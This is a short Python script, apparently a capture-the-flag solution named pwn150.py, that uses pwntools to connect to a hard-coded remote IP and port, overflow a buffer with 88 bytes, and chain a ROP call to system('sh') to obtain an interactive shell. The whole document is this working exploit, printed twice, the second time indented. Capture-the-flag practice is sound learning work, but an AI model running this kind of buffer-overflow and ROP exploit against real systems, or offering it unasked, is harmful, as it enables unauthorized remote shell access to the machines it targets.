Becojo/pwn150.py

## pwn150.py
from pwn import *

context.arch = 'amd64'

elf = ELF('./pwn150')
# p = process('tee i | ./pwn150', shell=True)
p = remote("54.153.19.139", 5253)

offset = 88

payload = 'a' * (offset)

rop = ROP(ELF('pwn150'))
rop.system(next(elf.search("sh\x00")))

payload += str(rop)

p.sendline(payload)

p.interactive()
	from pwn import *

	context.arch = 'amd64'

	elf = ELF('./pwn150')
	# p = process('tee i \| ./pwn150', shell=True)
	p = remote("54.153.19.139", 5253)

	offset = 88

	payload = 'a' * (offset)

	rop = ROP(ELF('pwn150'))
	rop.system(next(elf.search("sh\x00")))

	payload += str(rop)

	p.sendline(payload)

	p.interactive()